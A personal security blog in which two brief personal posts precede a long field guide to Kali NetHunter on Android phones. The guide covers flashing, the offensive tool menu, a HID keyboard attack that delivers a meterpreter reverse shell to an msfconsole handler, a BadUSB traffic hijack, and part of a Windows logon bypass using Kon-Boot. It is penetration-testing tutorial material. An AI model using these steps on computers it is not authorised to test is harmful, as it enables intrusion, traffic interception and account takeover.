Sword Soul (le4f.net) 2015-12-31T08:30:00Z
Happy New Year 2016 2015-12-31T08:30:00Z essay/happy-new-year Sword Soul
<p class="md_block"> <span class="md_line">Looking back, this year went by quickly. At the start of the year I said I would fill in the gaps, and I still have not posted an update.</span> </p>
<p class="md_block"> <span class="md_line">It is the end of the year, so here are a few words to mark it.</span> </p>
<p class="md_block"> <span class="md_line">To everyone who has followed this blog: a happy and smooth 2016 :)</span> </p>
Things About My Blog 2015-01-20T16:00:00Z essay/things-about-blog Sword Soul
<h4 id="toc_0">Style</h4>
<p class="md_block"> <span class="md_line">Since I put out the first <code>冷夜&#39;s Blog</code> in 2011, I have kept tending this little plot of my own. As my understanding and ideas changed, the look of the blog changed with them. Later, zing showed me this team's minimalist blog: <a class="md_compiled" href="http://shell-storm.org/">http://shell-storm.org/</a></span> </p>
<p class="md_block"> <span class="md_line">Last year, using that style as the blueprint, I built yet another customised template on FarBox, a platform I rather like.</span> </p>
<p class="md_block"> <span class="md_line">It fits my needs and my taste :)</span> </p>
<h4 id="toc_1">Name</h4>
<p class="md_block"> <span class="md_line">The blog used to carry my usual handle (冷夜) as its name. When I reorganised it last year, after much deliberation I named it Sword Soul, meaning <code>剑魄(琴心)</code>. It has a slightly adolescent ring to it, but there is a story behind it, lol~</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/swordsoul.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">As for the exact meaning, I will keep that answer to myself.</span> </p>
<h4 id="toc_2">Posts</h4>
<p class="md_block"> <span class="md_line">With the template in place, over the past year I have gradually restored the old posts as a kind of archive. New research and write-ups will continue to be added.</span> </p>
<p class="md_block"> <span class="md_line">The KnownWiki link in the top right corner records small day-to-day tricks; it may not be updated promptly.</span> </p>
<h4 id="toc_3">Readers</h4>
<p class="md_block"> <span class="md_line">I hope the posts are useful to readers. Anyone who wants to follow along can subscribe via <a class="md_compiled" href="/feed">RSS</a>.</span> </p>
<h4 id="toc_4">Future</h4>
<p class="md_block"> <span class="md_line">I will come back and revise this post later ;)</span> </p>
Pocket Hacking: NetHunter Field Guide 2015-01-19T16:00:00Z post/pocket-hacking-nethunter-field-guide Sword Soul
<p class="md_block"> <span class="md_line">This article has been published on <a class="md_compiled" 
href="http://drops.wooyun.org/tips/4634">WooYun Drops (乌云Drops)</a>; please do not repost without permission.</span> </p>
<h4 id="toc_0">0x00 Introduction</h4>
<p class="md_block"> <span class="md_line">Many people have wished that their hacking toolkit could move conveniently from the PC to a more portable phone or tablet. Kali NetHunter, released by the Offensive Security team, makes that wish real: hacking from a mobile device anywhere, at any time, which I will flatteringly call "pocket hacking".</span> </p>
<p class="md_block"> <span class="md_line">Kali NetHunter is a portable penetration-testing platform built on stock Android, with Nexus phones and tablets as its base hardware (support for the OnePlus One was recently added). The familiar Kali makes it easy to pick up, and the graphical control panel makes certain tests easier still. Engineers can also build on the platform freely and add their own projects.</span> </p>
<p class="md_block"> <span class="md_line">Articles about NetHunter, in China and abroad, are relatively few and largely repeat each other, so here I collect and explain its main practical techniques for fellow enthusiasts to refer to. Given the limited material, mistakes are hard to avoid; corrections are welcome.</span> </p>
<h4 id="toc_1">0x01 Supported hardware</h4>
<p class="md_block"> <span class="md_line">The NetHunter site lists the following devices that can be flashed with NetHunter:</span> </p>
<pre><code>Nexus 4 (GSM) - “mako”
Nexus 5 (GSM/LTE) - “hammerhead”
Nexus 7 [2012] (Wi-Fi) - “nakasi”
Nexus 7 [2012] (Mobile) - “nakasig”
Nexus 7 [2013] (Wi-Fi) - “razor”
Nexus 7 [2013] (Mobile) - “razorg”
Nexus 10 (Tablet) - “mantaray”
OnePlus One 16 GB - “bacon”
OnePlus One 64 GB - “bacon”</code></pre>
<p class="md_block"> <span class="md_line">Notably, the 2015 NetHunter update added the OnePlus One to the supported list thanks to its low price and high performance; OnePlus owners are in luck. The flashing walkthrough below uses the Nexus 5.</span> </p>
<h4 id="toc_2">0x02 Flashing procedure</h4>
<p class="md_block"> <span class="md_line">The official site offers several flashing methods; the recommended one is the Windows installer wizard. Download link:</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><a class="md_compiled" href="https://www.kali.org/offsec-nethunter-installer/Kali_v1.1.6.sfx.exe">https://www.kali.org/offsec-nethunter-installer/Kali_v1.1.6.sfx.exe</a></span> </p>
<p class="md_block"> <span class="md_line">Run the installer and install to the default path.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-01.png" alt="img" title="" ></span> </p>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">After installation, NetHunter Installer starts automatically, updates itself, and enters the guided installation steps.</span> </p>
<ul> <li class="md_li"> Step 1: select your device model. 
</li> </ul>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-02.png" alt="img" title="" ></span> </p>
<ul> <li class="md_li"> Step 2: install the drivers </li> </ul>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-03.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-04.png" alt="img" title="" ></span> </p>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">You can confirm that the drivers installed correctly with Test Drivers.</span> </p>
<ul> <li class="md_li"> Step 3: installation options </li> </ul>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-05.png" alt="img" title="" ></span> </p>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">If you have already downloaded the flash package from the official site, select the file with Browse. Download link:<br /></span> <span class="md_line md_line_dom_embed"><a class="md_compiled" href="http://www.offensive-security.com/kali-linux-nethunter-download/">http://www.offensive-security.com/kali-linux-nethunter-download/</a><br /></span> <span class="md_line">Remember to verify the SHA1 checksum after downloading. As for Android Flash Setting, support for Android L was not yet complete, so that option is not yet selectable.</span> </p>
<ul> <li class="md_li"> Step 4: download the files </li> </ul>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-06.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">As shown, download all the dependency files.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-07.png" alt="img" title="" ></span> </p>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">Once every dependency shows Ready, you can proceed to the flashing step.</span> </p>
<ul> <li class="md_li"> Step 5: unlock the device </li> </ul>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-08.png" 
alt="img" title="" ></span> </p>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">Unlock the bootloader. USB debugging must be enabled on the phone; it reboots to perform the unlock.</span> </p>
<ul> <li class="md_li"> Step 6: reset the original Android </li> </ul>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-09.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Again tick "allow USB debugging" on the phone. Note that this wipes all data, so back up first.</span> </p>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-10.png" alt="img" title="" ></span> </p>
<ul> <li class="md_li"> Step 7: flash NetHunter </li> </ul>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-11.png" alt="img" title="" ></span> </p>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">After the reset in the previous step, developer mode has to be re-enabled. Now the Kali Linux image can be flashed and the phone rooted; this takes a relatively long time. (Note: if pushing the image fails, you can manually copy kali_linux_nethunter_1.10_hammerhead_kitkat.zip to /sdcard/download/ and run INSTALL.)</span> </p>
<ul> <li class="md_li"> Final: installation complete </li> </ul>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-12.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-13.png" alt="img" title="" ></span> </p>
<h4 id="toc_3">0x03 Recommended apps</h4>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">Once the system is flashed, you can install a few Android apps to complement NetHunter's built-in tools. My personal recommendations:</span> </p>
<ul>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Chinese input method: a must for a Chinese speaker</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> File manager (e.g. RootExplorer): some Kali files can only be reached with a file manager that supports root access.</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> ShadowSocks: you still need a way over the wall</span> </p> <p class="md_block"> <span class="md_line 
md_line_dom_embed"><a class="md_compiled" href="https://github.com/shadowsocks/shadowsocks-android/releases/download/v2.6.2/shadowsocks-nightly-2.6.2.apk">https://github.com/shadowsocks/shadowsocks-android/releases/download/v2.6.2/shadowsocks-nightly-2.6.2.apk</a></span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> MITM tools:</span> </p>
<pre><code>zANTI2: commercial, with some features restricted, but the user experience is genuinely better
dSploit: once very well known
lanmitm: written and released by a Chinese security researcher
Intercepter-NG: sniffing tool
Network Spoofer: comes with many prank features</code></pre> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> IPTools: a collection of common basic network tools</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-14.png" alt="img" title="" ></span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> ChangeHostname: changes the phone's hostname (still worth doing).</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> WiGLE wifi: war-driving tool; collects wireless access point information and can save it to a local database.</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> SQLiteEditor: convenient for reading database contents</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Hacker&#39;s KeyBoard: ships with NetHunter; convenient for entering control characters</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Remote desktop: ships with NetHunter; for connecting to VNC services.</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> DriveDroid: ships with NetHunter; presents an image stored on the phone as a bootable drive.</span> </p> </li>
</ul>
<h4 id="toc_4">0x04 Directories and services</h4>
<p class="md_block"> <span class="md_line">With NetHunter installed, the first thing to do is study its directory layout and services. The Kali NetHunter root corresponds to /data/local/kali-armhf in the Android file system.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-15.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">NetHunter's bundled tools mostly live under this directory too, so if you cannot find where a capture or log file went, look here (note: root access required). Paths that some NetHunter tools print at run time are also relative to this root.</span> </p>
<p class="md_block"> <span 
class="md_line">Captured packets and similar files are usually stored in the Captures directory under the NetHunter root:</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-16.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">As in Kali Linux, /usr/share holds most of the tools, with links created so they can be invoked directly from the command line.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-17.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Metasploit still lives under /opt/.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-18.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">The /opt/dic directory in the screenshot above holds wordlists; add your own as needed.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-19.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">This is /var/www; I expect everyone knows what that is for :)</span> </p>
<p class="md_block"> <span class="md_line">As for services, in the new version the Offensive Security team added NetHunter Home, an app that manages the service switches. This avoids the drawbacks of the earlier versions' web-server based management (for instance the web page loading Google Fonts and stalling behind the Great Firewall ;)</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-20.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">As shown, NetHunter Home is the main page; besides the Offensive Security banner it shows the current (internal/external) IP address.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-21.png" alt="img" title="" ></span> </p>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">Kali Launcher bundles four launchers:</span> </p>
<ul>
<li class="md_li"> open a Kali shell in the terminal </li>
<li class="md_li"> open the Kali NetHunter Menu in the terminal </li>
<li class="md_li"> open Wifite in the terminal for wireless cracking </li>
<li class="md_li"> update Kali NetHunter (runs sudo -c bootkali update) </li>
</ul>
<p class="md_block"> <span 
class="md_line">NetHunter's service switches are configured in the Kali Service Control panel.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-22.png" alt="img" title="" ></span> </p>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">As you can see, the services NetHunter can expose include SSH, Dnsmasq, Hostapd, OpenVPN, Apache, Metasploit and the BeEF Framework.</span> </p>
<ul>
<li class="md_li"> SSH service: Secure Shell, for connecting from and controlling via other devices. </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Dnsmasq service: DNS resolution.</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Hostapd service: provides a wireless access point.</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> OpenVPN service: accepts incoming OpenVPN connections.</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Apache service: web server.</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Metasploit service: backs the MSF attack modules.</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> BeEF Framework service: XSS exploitation framework.</span> </p> </li>
</ul>
<p class="md_block"> <span class="md_line">Each of these services can be switched on or off from this panel.</span> </p>
<h4 id="toc_5">0x05 Kali NetHunter Menu</h4>
<p class="md_block"> <span class="md_line">The Kali Menu entry in the NetHunter Launcher collects NetHunter's commonly used tools, as shown:</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-25.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Compared with the previous version, the following options are new:</span> </p>
<pre><code>USB Attacks
NFC Attacks
Monitor Mode
Eject USB Wifi</code></pre>
<p class="md_block"> <span class="md_line">The main modules are as follows:</span> </p>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Wireless Attacks</strong></span> </p>
<ul>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Wifite</span> </p> <p class="md_block"> <span 
class="md_line">Automated wireless security auditing tool</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Kismet</span> </p> <p class="md_block"> <span class="md_line">Wireless war-driving tool</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> AP F**ker</span> </p> <p class="md_block"> <span class="md_line">Wireless attack tool (mostly denial of service)</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Wash</span> </p> <p class="md_block"> <span class="md_line">Scans for wireless networks with WPS enabled</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Airodump-ng</span> </p> <p class="md_block"> <span class="md_line">The basic wireless attack suite (essential)</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Pingen</span> </p> <p class="md_block"> <span class="md_line">Computes the WPS PIN of certain WPS-enabled D-Link routers in order to crack them</span> </p> </li>
</ul>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Sniffing/Spoofing</strong></span> </p>
<ul>
<li class="md_li"> <p class="md_block"> <span class="md_line"> tcpdump</span> </p> <p class="md_block"> <span class="md_line">Basic traffic dump tool</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> tshark</span> </p> <p class="md_block"> <span class="md_line">Wireshark's command-line tool; captures and analyses traffic</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> urlsnarf</span> </p> <p class="md_block"> <span class="md_line">Part of the Dsniff suite; sniffs the content of HTTP requests and outputs it in Common Log Format (CLF)</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> dsniff</span> </p> <p class="md_block"> <span class="md_line">The well-known, powerful password-sniffing suite</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> MITMproxy</span> </p> <p class="md_block"> <span class="md_line">Intercepting proxy that can capture and modify HTTP traffic; see the official site</span> </p> </li>
</ul>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Reverse Shells</strong></span> 
</p>
<ul>
<li class="md_li"> <p class="md_block"> <span class="md_line"> AutoSSH</span> </p> <p class="md_block"> <span class="md_line">Reverse shell over SSH (NAT bypass)</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> pTunnel</span> </p> <p class="md_block"> <span class="md_line">Tunnels data through ICMP packets</span> </p> </li>
</ul>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Info Gathering</strong></span> </p>
<ul>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Spiderfoot</span> </p> <p class="md_block"> <span class="md_line">Open-source scanning and reconnaissance tool; for a given domain it collects subdomains, email addresses, web server versions and so on, as an automated scan.</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Recon-ng</span> </p> <p class="md_block"> <span class="md_line">Powerful modular reconnaissance tool; unfortunately many of its plugins are unusable in China (the wall again).</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Device-pharmer</span> </p> <p class="md_block"> <span class="md_line">Searches via Shodan; big-data hacking.</span> </p> </li>
</ul>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Vulnerability Scan</strong></span> </p>
<ul>
<li class="md_li"> <p class="md_block"> <span class="md_line"> OpenVas</span> </p> <p class="md_block"> <span class="md_line">Vulnerability scanner; requires separate installation. Kali has always included it by default; whether it is any good is for you to judge. 
:)</span> </p> </li>
</ul>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Exploit Tools</strong></span> </p>
<ul>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Metasploit</span> </p> <p class="md_block"> <span class="md_line">Powerful, central, essential</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> BeEF-XSS</span> </p> <p class="md_block"> <span class="md_line">XSS penetration-testing tool; use according to personal preference</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Social-Engineering-Toolkit</span> </p> <p class="md_block"> <span class="md_line">SET under Kali, the social-engineering suite; very capable.</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> MITMf</span> </p> <p class="md_block"> <span class="md_line">Man-in-the-middle attack framework written in Python, with many plugins; powerful for penetration testing</span> </p> </li>
</ul>
<p class="md_block"> <span class="md_line md_line_dom_embed"><strong>OpenVPN Setup</strong></span> </p>
<p class="md_block"> <span class="md_line">OpenVPN settings</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><strong>VNC Setup</strong></span> </p>
<p class="md_block"> <span class="md_line">VNC settings</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><strong>Log/Capture Menu</strong></span> </p>
<p class="md_block"> <span class="md_line">Wipes all locally captured data or syncs it to the SD card (syncing mainly solves a permission problem: most Android apps cannot read the data captured by NetHunter tools unless they have root access).</span> </p>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>USB Attacks</strong></span> </p>
<ul>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Dictionary based brute force attack</span> </p> <p class="md_block"> <span class="md_line">Types one line of a wordlist and presses Enter, line after line; an HID-based brute-force attack that imitates manual input</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> deADBolt</span> </p> <p class="md_block"> <span class="md_line">Runs a batch of ADB commands that can push private files and other data to a given directory; see the project page<br /></span> <span 
class="md_line">https://github.com/photonicgeek/deADBolt</span> </p> </li>
</ul>
<p class="md_block"> <span class="md_line md_line_dom_embed"><strong>NFC Attack</strong></span> </p>
<p class="md_block"> <span class="md_line">Provides copy, rewrite and view functions for Mifare card data (perhaps no need to carry the Acr122u any more ;)</span> </p>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Settings</strong></span> </p>
<ul>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Change the time zone</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Create a user and database for Metasploit</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Change the MAC address</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Install NodeJS</span> </p> </li>
</ul>
<p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line md_line_dom_embed"><strong>Service</strong></span> </p>
<ul>
<li class="md_li"> <p class="md_block"> <span class="md_line"> SSH service switch</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> VNC service switch</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> OpenVPN service switch</span> </p> </li>
<li class="md_li"> <p class="md_block"> <span class="md_line"> Start a local X server</span> </p> </li>
</ul>
<p class="md_block"> <span class="md_line md_line_dom_embed"><strong>Monitor Mode</strong></span> </p>
<p class="md_block"> <span class="md_line">Enables or disables monitor (promiscuous) mode on wlan1 (the external wireless adapter)</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><strong>Eject USB Wifi</strong></span> </p>
<p class="md_block"> <span class="md_line">Ejects the USB wireless adapter</span> </p>
<h4 id="toc_6">0x06 HID Keyboard Attack</h4>
<p class="md_block"> <span class="md_line">In the past, USB auto-start usually relied on the autorun.inf on the inserted USB device. That trick rarely works nowadays, and the emerging USB HID attack has become the new threat: by emulating keyboard or mouse input, a USB HID device can execute target code in real time. Here I use PowerSploit together with MSF as the example:</span> </p>
<p class="md_block"> <span class="md_line">First start the web server that hosts the payload: enable the Apache service in Kali Service Control</span> </p> 
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-30.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Go to the HID attack configuration page and select PowerSploit</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-31.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">For IP and port, enter the IP and port that MSF listens on. For the payload we choose windows/meterpreter/reverse_https. The URL is the IP of the host serving Apache, here the phone itself: 192.168.1.151</span> </p>
<p class="md_block"> <span class="md_line">After configuring, press UPDATE to write the configuration file. Next, set up the MSF listener for the reverse shell</span> </p>
<pre><code>root@kali:~# msfconsole -q
msf &gt; use exploit/multi/handler
msf exploit(handler) &gt;</code></pre>
<p class="md_block"> <span class="md_line">The payload is the same one chosen on the HID configuration page</span> </p>
<pre><code>msf exploit(handler) &gt; set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD =&gt; windows/meterpreter/reverse_https</code></pre>
<p class="md_block"> <span class="md_line">Set the IP and port the same way</span> </p>
<pre><code>msf exploit(handler) &gt; set LHOST 192.168.0.17
LHOST =&gt; 192.168.0.17
msf exploit(handler) &gt; set LPORT 4444
LPORT =&gt; 4444
msf exploit(handler) &gt; exploit
[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...</code></pre>
<p class="md_block"> <span class="md_line">Configuration done</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-32.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Start listening</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-33.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Now connect the device to the PC, wait for it to be recognised, then press Execute to start the attack.</span> </p>
<p class="md_block"> <span class="md_line">Once the PowerShell command has run, the reverse shell shows up in msf:</span> </p> 
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-34.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">If nothing happens after connecting to the PC, press Reset USB to refresh.</span> </p>
<p class="md_block"> <span class="md_line">The HID Keyboard Attack also offers a Windows CMD attack module: once connected to the computer it automatically opens CMD and runs a specified command (by default adding a new administrator user; fully customisable).</span> </p>
<h4 id="toc_7">0x07 BadUSB MITM Attack</h4>
<p class="md_block"> <span class="md_line">The BadUSB attack, presented at Black Hat, is a fairly advanced class of USB attack: payloads that emulate keyboard input and the like can perform certain actions automatically. NetHunter's BadUSB MITM Attack is one such variant: it changes the host's network settings and hijacks its network traffic.</span> </p>
<p class="md_block"> <span class="md_line">The NetHunter site has a demo video of the BadUSB MITM Attack at <a class="md_compiled" href="http://www.nethunter.com/showcase/">http://www.nethunter.com/showcase/</a>, but it does not explain the details, so here is my own walkthrough:</span> </p>
<p class="md_block"> <span class="md_line">First make sure MTP file transfer is turned off while the phone is connected to the target computer. Connect to the target computer and turn on USB tethering on the phone:</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-40.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Now open a Kali shell from NetHunter Home; the interface list shows a new virtual interface, rndis0 (the USB tethering interface).</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-41.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">At this point you can start tcpdump to capture traffic, for example:</span> </p>
<pre><code>tcpdump -i rndis0</code></pre>
<p class="md_block"> <span class="md_line">Back in NetHunter Home, switch to BadUSB MiTM Attack and tick Start BadUSB Attack in the top right corner</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-42.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">The connected computer now gains an extra network adapter whose gateway is the IP address of rndis0</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-43.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span 
class="md_line">Traffic can now be captured; for example, when the PC visits some websites, tcpdump on the phone shows traffic like this:</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-44.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Because the phone had no SIM card inserted and therefore no network, the PC could not receive the pages it requested.</span> </p>
<p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line">An earlier Drops article by a fellow researcher, <a class="md_compiled" href="http://drops.wooyun.org/tools/3113">Kali Nethunter初体验 (First Impressions of Kali NetHunter)</a>, mentioned:</span> </p>
<blockquote> <p class="md_block"> <span class="md_line"> A dual-gateway situation arose, so instead of routing traffic straight to the malicious gateway (10.0.0.1) as in the official demo, it kept using the previous gateway (192.168.1.1), and the hijack failed</span> </p> </blockquote>
<p class="md_block"> <span class="md_line">That can happen, but in my own tests the network connection priority defaulted to giving the hijacked gateway higher priority, so traffic was hijacked normally. It may also be an optimisation made in this year's NetHunter update, as shown:</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-45.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Combining this with the HID Keyboard Attack is also a good way to test; saving and analysing the captured packets is left to you.</span> </p>
<h4 id="toc_8">0x08 Bypassing Windows logon authentication</h4>
<p class="md_block"> <span class="md_line">NetHunter has many hidden tricks, such as using DriveDroid to bypass the Windows logon password.</span> </p>
<p class="md_block"> <span class="md_line">DriveDroid is an app that lets a PC boot from an ISO/IMG image file stored on an Android phone, but combined with a particular image, bypassing Windows logon authentication becomes feasible :)</span> </p>
<p class="md_block"> <span class="md_line">Using Windows 7 as the example, first set the default account's password to hello.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-50.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">DriveDroid's default image directory is SDCard/Download/images; just place the image you want to boot there.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-51.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">The image used here to bypass Windows or OS X logon authentication is Kon-Boot. See its official site for details: it hooks the BIOS to modify the kernel's boot handling, skipping the SAM check and logging straight into the system. Since it is paid software, the demo below uses an image I found on my own.</span> </p>
<p 
class="md_block"> <span class="md_line">Turn off MTP file transfer and open DriveDroid; it automatically lists the image files in the images directory.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-52.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Select the Kon-Boot.img image to mount, choosing Read-Only USB as the mode</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-53.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Once loaded, the image is marked accordingly</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-54.png" alt="img" title="" ></span> </p>
